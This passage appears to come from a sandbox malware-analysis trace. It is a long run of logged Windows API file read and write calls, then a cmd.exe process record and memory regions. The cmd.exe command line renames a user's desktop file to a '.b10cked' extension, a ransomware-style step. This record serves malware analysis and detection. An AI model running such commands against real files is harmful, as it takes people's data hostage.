(in: hFile=0x54, lpBuffer=0x18f278, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e468, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesRead=0x18e468*=0x200, lpOverlapped=0x0) returned 1 [0224.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.707] GetFileType (hFile=0x4c) returned 0x1 [0224.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.707] GetFileType (hFile=0x4c) returned 0x1 [0224.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.707] WriteFile (in: hFile=0x4c, lpBuffer=0x18f278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.707] GetFileType (hFile=0x4c) returned 0x1 [0224.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.707] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f2c8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.707] GetFileType (hFile=0x4c) returned 0x1 [0224.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.707] WriteFile (in: hFile=0x4c, lpBuffer=0x18f318*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f318*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.707] GetFileType (hFile=0x4c) returned 0x1 [0224.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.708] WriteFile (in: hFile=0x4c, lpBuffer=0x18f368*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f368*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.708] GetFileType (hFile=0x4c) returned 0x1 [0224.708] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0224.708] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f3b8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.708] GetFileType (hFile=0x4c) returned 0x1 [0224.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.708] WriteFile (in: hFile=0x4c, lpBuffer=0x18f408*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f408*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.708] GetFileType (hFile=0x4c) returned 0x1 [0224.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.708] WriteFile (in: hFile=0x4c, lpBuffer=0x18f458*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f458*, lpNumberOfBytesWritten=0x18e45c*=0x20, lpOverlapped=0x0) returned 1 [0224.708] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.708] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e448 | out: lpNewFilePointer=0x0) returned 1 [0224.708] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.708] ReadFile (in: hFile=0x54, lpBuffer=0x18f278, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e468, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesRead=0x18e468*=0x200, lpOverlapped=0x0) returned 1 [0224.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.708] GetFileType (hFile=0x4c) returned 0x1 [0224.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.708] GetFileType (hFile=0x4c) returned 0x1 [0224.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.708] WriteFile (in: hFile=0x4c, lpBuffer=0x18f278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, 
lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.708] GetFileType (hFile=0x4c) returned 0x1 [0224.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.708] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f2c8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.709] GetFileType (hFile=0x4c) returned 0x1 [0224.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.709] WriteFile (in: hFile=0x4c, lpBuffer=0x18f318*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f318*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.709] GetFileType (hFile=0x4c) returned 0x1 [0224.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.709] WriteFile (in: hFile=0x4c, lpBuffer=0x18f368*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f368*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.709] GetFileType (hFile=0x4c) returned 0x1 [0224.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.709] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f3b8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.709] GetFileType (hFile=0x4c) returned 0x1 [0224.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.709] WriteFile (in: hFile=0x4c, lpBuffer=0x18f408*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f408*, lpNumberOfBytesWritten=0x18e45c*=0x50, 
lpOverlapped=0x0) returned 1 [0224.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.709] GetFileType (hFile=0x4c) returned 0x1 [0224.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.709] WriteFile (in: hFile=0x4c, lpBuffer=0x18f458*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f458*, lpNumberOfBytesWritten=0x18e45c*=0x20, lpOverlapped=0x0) returned 1 [0224.709] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.709] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e448 | out: lpNewFilePointer=0x0) returned 1 [0224.709] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.709] ReadFile (in: hFile=0x54, lpBuffer=0x18f278, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e468, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesRead=0x18e468*=0x200, lpOverlapped=0x0) returned 1 [0224.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.709] GetFileType (hFile=0x4c) returned 0x1 [0224.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.709] GetFileType (hFile=0x4c) returned 0x1 [0224.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.709] WriteFile (in: hFile=0x4c, lpBuffer=0x18f278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.710] GetFileType (hFile=0x4c) returned 0x1 [0224.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.710] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f2c8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.710] GetFileType (hFile=0x4c) returned 0x1 [0224.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.710] WriteFile (in: hFile=0x4c, 
lpBuffer=0x18f318*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f318*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.710] GetFileType (hFile=0x4c) returned 0x1 [0224.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.710] WriteFile (in: hFile=0x4c, lpBuffer=0x18f368*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f368*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.710] GetFileType (hFile=0x4c) returned 0x1 [0224.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.710] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f3b8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.710] GetFileType (hFile=0x4c) returned 0x1 [0224.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.710] WriteFile (in: hFile=0x4c, lpBuffer=0x18f408*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f408*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.710] GetFileType (hFile=0x4c) returned 0x1 [0224.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.710] WriteFile (in: hFile=0x4c, lpBuffer=0x18f458*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f458*, lpNumberOfBytesWritten=0x18e45c*=0x20, lpOverlapped=0x0) returned 1 [0224.710] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.710] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e448 | out: lpNewFilePointer=0x0) returned 1 [0224.710] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0224.710] ReadFile (in: hFile=0x54, lpBuffer=0x18f278, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e468, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesRead=0x18e468*=0x200, lpOverlapped=0x0) returned 1 [0224.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.710] GetFileType (hFile=0x4c) returned 0x1 [0224.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.711] GetFileType (hFile=0x4c) returned 0x1 [0224.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.711] WriteFile (in: hFile=0x4c, lpBuffer=0x18f278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.711] GetFileType (hFile=0x4c) returned 0x1 [0224.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.711] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f2c8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.711] GetFileType (hFile=0x4c) returned 0x1 [0224.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.711] WriteFile (in: hFile=0x4c, lpBuffer=0x18f318*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f318*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.711] GetFileType (hFile=0x4c) returned 0x1 [0224.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.711] WriteFile (in: hFile=0x4c, lpBuffer=0x18f368*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f368*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.711] 
GetFileType (hFile=0x4c) returned 0x1 [0224.977] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.977] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f3b8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.977] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.977] GetFileType (hFile=0x4c) returned 0x1 [0224.977] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.977] WriteFile (in: hFile=0x4c, lpBuffer=0x18f408*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f408*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.977] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.977] GetFileType (hFile=0x4c) returned 0x1 [0224.977] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.977] WriteFile (in: hFile=0x4c, lpBuffer=0x18f458*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f458*, lpNumberOfBytesWritten=0x18e45c*=0x20, lpOverlapped=0x0) returned 1 [0224.977] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.977] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e448 | out: lpNewFilePointer=0x0) returned 1 [0224.977] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.977] ReadFile (in: hFile=0x54, lpBuffer=0x18f278, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e468, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesRead=0x18e468*=0x200, lpOverlapped=0x0) returned 1 [0224.977] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.978] GetFileType (hFile=0x4c) returned 0x1 [0224.978] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.978] GetFileType (hFile=0x4c) returned 0x1 [0224.978] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.978] WriteFile (in: hFile=0x4c, lpBuffer=0x18f278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | 
out: lpBuffer=0x18f278*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.978] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.978] GetFileType (hFile=0x4c) returned 0x1 [0224.978] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.978] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f2c8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.978] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.978] GetFileType (hFile=0x4c) returned 0x1 [0224.978] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.978] WriteFile (in: hFile=0x4c, lpBuffer=0x18f318*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f318*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.978] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.978] GetFileType (hFile=0x4c) returned 0x1 [0224.978] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.978] WriteFile (in: hFile=0x4c, lpBuffer=0x18f368*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f368*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.978] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.978] GetFileType (hFile=0x4c) returned 0x1 [0224.978] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.978] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f3b8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.979] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.979] GetFileType (hFile=0x4c) returned 0x1 [0224.979] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.979] WriteFile (in: hFile=0x4c, lpBuffer=0x18f408*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f408*, 
lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.979] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.979] GetFileType (hFile=0x4c) returned 0x1 [0224.979] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.979] WriteFile (in: hFile=0x4c, lpBuffer=0x18f458*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f458*, lpNumberOfBytesWritten=0x18e45c*=0x20, lpOverlapped=0x0) returned 1 [0224.979] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.979] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e448 | out: lpNewFilePointer=0x0) returned 1 [0224.979] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.979] ReadFile (in: hFile=0x54, lpBuffer=0x18f278, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e468, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesRead=0x18e468*=0x200, lpOverlapped=0x0) returned 1 [0224.979] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.979] GetFileType (hFile=0x4c) returned 0x1 [0224.979] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.979] GetFileType (hFile=0x4c) returned 0x1 [0224.979] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.979] WriteFile (in: hFile=0x4c, lpBuffer=0x18f278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.979] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.979] GetFileType (hFile=0x4c) returned 0x1 [0224.979] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.979] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f2c8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.980] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.980] GetFileType (hFile=0x4c) returned 0x1 [0224.980] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0224.980] WriteFile (in: hFile=0x4c, lpBuffer=0x18f318*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f318*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.980] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.980] GetFileType (hFile=0x4c) returned 0x1 [0224.980] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.980] WriteFile (in: hFile=0x4c, lpBuffer=0x18f368*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f368*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.980] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.980] GetFileType (hFile=0x4c) returned 0x1 [0224.980] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.980] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f3b8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.980] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.980] GetFileType (hFile=0x4c) returned 0x1 [0224.980] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.980] WriteFile (in: hFile=0x4c, lpBuffer=0x18f408*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f408*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.980] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.980] GetFileType (hFile=0x4c) returned 0x1 [0224.980] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.980] WriteFile (in: hFile=0x4c, lpBuffer=0x18f458*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f458*, lpNumberOfBytesWritten=0x18e45c*=0x20, lpOverlapped=0x0) returned 1 [0224.980] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.981] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e448 | out: lpNewFilePointer=0x0) 
returned 1 [0224.981] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.981] ReadFile (in: hFile=0x54, lpBuffer=0x18f278, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e468, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesRead=0x18e468*=0x32, lpOverlapped=0x0) returned 1 [0224.981] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.981] GetFileType (hFile=0x4c) returned 0x1 [0224.981] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.981] GetFileType (hFile=0x4c) returned 0x1 [0224.981] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.981] WriteFile (in: hFile=0x4c, lpBuffer=0x18f278*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesWritten=0x18e45c*=0x32, lpOverlapped=0x0) returned 1 [0224.981] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.981] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e448 | out: lpNewFilePointer=0x0) returned 1 [0224.981] _close (_FileHandle=4) returned 0 [0224.981] FindNextFileW (in: hFindFile=0x230e88, lpFindFileData=0x18f4dc | out: lpFindFileData=0x18f4dc) returned 0 [0224.982] GetLastError () returned 0x12 [0224.982] FindClose (in: hFindFile=0x230e88 | out: hFindFile=0x230e88) returned 1 [0224.982] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0224.983] _close (_FileHandle=3) returned 0 [0224.983] _get_osfhandle (_FileHandle=1) returned 0x7 [0224.983] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0224.983] _get_osfhandle (_FileHandle=1) returned 0x7 [0224.983] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e241ac | out: lpMode=0x49e241ac) returned 1 [0224.983] _get_osfhandle (_FileHandle=0) returned 0x3 [0224.983] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e241b0 | out: lpMode=0x49e241b0) returned 1 [0224.983] SetConsoleInputExeNameW () returned 0x1 [0224.983] GetConsoleOutputCP () returned 0x1b5 [0224.984] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | 
out: lpCPInfo=0x49e24260) returned 1 [0224.984] SetThreadUILanguage (LangId=0x0) returned 0x409 [0224.984] exit (_Code=0) Process: id = "589" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16780" os_pid = "0xf74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 33579 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 33580 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 33581 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 33582 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 33583 start_va = 0x49e00000 end_va = 0x49e4bfff entry_point = 0x49e00000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 33584 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = 
"\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 33585 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 33586 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 33587 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 33588 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33765 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33766 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33767 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 33768 start_va = 